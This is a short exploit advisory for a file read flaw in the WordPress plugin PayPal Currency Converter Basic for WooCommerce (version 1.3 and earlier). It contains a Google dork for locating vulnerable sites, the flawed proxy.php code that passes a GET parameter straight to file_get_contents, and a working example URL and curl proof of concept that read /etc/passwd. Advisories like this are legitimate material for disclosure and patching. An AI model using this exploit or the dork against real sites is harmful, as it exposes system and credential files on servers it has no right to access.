26 lines
No EOL
1 KiB
Text
26 lines
No EOL
1 KiB
Text
# Exploit Title: Paypal Currency Converter Basic For Woocommerce File Read
|
|
# Google Dork: inurl:"paypal-currency-converter-basic-for-woocommerce"
|
|
# Date: 10/06/2015
|
|
# Exploit Author: Kuroi'SH
|
|
# Software Link:
|
|
https://wordpress.org/plugins/paypal-currency-converter-basic-for-woocommerce/
|
|
# Version: <=1.3
|
|
# Tested on: Linux
|
|
Description:
|
|
proxy.php's code:
|
|
<?php
|
|
$file = file_get_contents($_GET['requrl']);
|
|
$left=strpos($file,'<div id=currency_converter_result>');
|
|
$right=strlen($file)-strpos($file,'<input type=hidden name=meta');
|
|
$snip= substr($file,$left,$right);
|
|
echo $snip;
|
|
?>
|
|
Based on user input, the content of a file is printed out (unfortunately
|
|
not included) so any html file can be loaded, and an attacker may be able
|
|
to read any local file which
|
|
is not executed in the server.
|
|
Example:
|
|
http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd
|
|
POC:
|
|
curl --silent --url
|
|
http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd |